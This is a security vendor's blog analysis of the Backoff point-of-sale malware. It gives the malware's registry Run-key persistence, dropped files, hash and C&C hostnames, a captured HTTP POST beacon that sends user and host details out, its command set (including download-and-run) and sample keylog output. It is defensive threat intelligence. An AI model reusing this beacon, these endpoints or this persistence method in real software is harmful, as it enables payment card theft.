Select Page

Cyren Security Blog

Credit card info stolen from point of sale machines targeted by “Backoff” malware

Threat Name

Backoff Malware

Threat Type

Trojan, Keylogger, Stealer

Although, this threat has been in the wild for some time, it has been recently reported that it is now being referred to as “Backoff”, and is being used to the infect Point-of-Sale (POS) machines of big retail stores in the United States. The intended purpose is to steal payment information, particularly credit card data.

The attackers tries to plant or deploy this threat into the POS machines, which mostly are running on Windows, by hacking or exploiting them to be able to get access. When the threat is running in an infected system, it tries to steal personal data (e.g. credit card info) from the system using different methods such as memory-scraping and keylogging, and then sends the stolen data to the Command and Control server (C&C) that the malware connects to.

TECHNICAL DETAILS

Startup Technique and payload analysis

The malware usually drops a copy of itself in the %APPDATA% folder and creates registry entries in

HKEY_USERS<some Class ID>SoftwareMicrosoftWindowsCurrentVersionRun

and

HKEY_USERSSoftwareMicrosoftWindowsCurrentVersionRun

so that it runs whenever the infected machine is restarted.

 

There are now different variations of this threat of which the functionalities are the same but with little differences in terms of installation and the C&C server it connects to. The name and version of each can be spotted in the HTTP POST data that it sends to the C&C server.

Name: Backoff

Version: 1.55

Md5 – f5b4786c28ccf43e569cb21a6122a97e

When executed, it drops the following files:

“%appdata%mskrnl – (this looks like a RC4 encrypted copy of itself)

“%appdata%AdobeFlashPlayermswinhost.exe” – (a copy of itself)

“%appdata%AdobeFlashPlayerlog.txt” – a text file where it save the data logged by its keylogging function

It also creates the following registry entries:

HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion

identifier = “<random characters>”

HKEY_USERSS-1-5-21-1060284298-261478967-725345543-500SoftwareMicrosoftWindowsCurrentVersion

identifier = “<random characters>”

The above registry value is a randomly generated 7 character string so it is different with every infection.

HKEY_USERSSoftwareMicrosoftWindowsCurrentVersionRun

Windows NT Service = “%AppData% AdobeFlashPlayermswinhost.exe”

HKEY_USERSS-1-5-21-1060284298-261478967-725345543-500SoftwareMicrosoftWindowsCurrentVersionRun

Windows NT Service = “%AppData% AdobeFlashPlayermswinhost.exe”

The above registry key is to make the threat run on start up.

Communication with C&C

Then it tries to connect to its Command and Control (C&C) server and sends the following POST data:

POST /aero2/fly.php HTTP/1.0

Host: <c&c server hostname>

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0

Accept-Language: en-us

Accept-Encoding: text/plain

Content-Type: application/x-www-form-urlencoded

Content-Length: 69

&op=1&id=<random characters>WgBClNZ&ui=<user_name> @ <hostname>&wv=11&gr=backoff&bv=1.55

 

Where:

op = This seems to always have a value of 1

id = randomly generated characters, this is the string saved in the above-mentioned registry entry

ui = currently logged-in user name and the hostname of the infected machine

wv = Windows version of infected machine

gr = could be the group name of malware e.g “backoff”

bv = version of malware “1.55”

C&C server hosts:

pop3smtp5imap2.com/aero2/fly.php

pop3smtp5imap3.com/aero2/fly.php

pop3smtp5imap4.ru/aero2/fly.php

After a successful connection to the C&C server, it will receive a reply which is usually a command or instruction coming from the server. The usual command receive is the string “Thanks!” which is probably just an acknowledgement that is has successfully connected to the server.

A “Thanks!“ reply looks like this:

HTTP/1.1 200 OK

Server: nginx/1.4.7

Date: Fri, 01 Aug 2014 22:09:51 GMT

Content-Type: text/html

Connection: close

X-Powered-By: PHP/5.3.28-1~dotdeb.0

Thanks!

Other commands

Other commands that the malware will get from the server are as follows:

* Update – most likely to instruct the malware to try and get an updated version

* Terminate – most likely to terminate all running instances in the infected machine

* Uninstall – most likely to uninstall or remove everything from the infected machine

* Download and Run – this command most likely will contain other data in the response which includes a link or location to download and execute a certain file.

* Upload Keylogs – most likely the command to upload the text file containing the keyloggers logged data (log.txt)

Keylogging Function:

As mentioned, the threat has a keylogging functions which logs the name of the current active window and any keystrokes performed in that window. As an example, the contents of log.txt may look like this

[Arrow Right][Backspace][Backspace][Backspace]

[Run] – [02/08/2014 17:40:40]

%appdata%[Arrow Down]

[Program Manager] – [02/08/2014 17:40:41]

[Enter]

[about:blank – Microsoft Internet Explorer] – [03/08/2014 16:03:46]

www.bankofamerica.com[Enter]mybogusloginID[Enter]

There are multiple variations of the malware which drop differently named files and use different registry entries.

You might also like

LinkedIn Phish Kit

Scam Warning Back in January, LinkedIn posted a warning about connection requests from individuals impersonating employees of a legitimate organization. These requests come from newly created accounts. If someone accepts the request, the attackers will have more...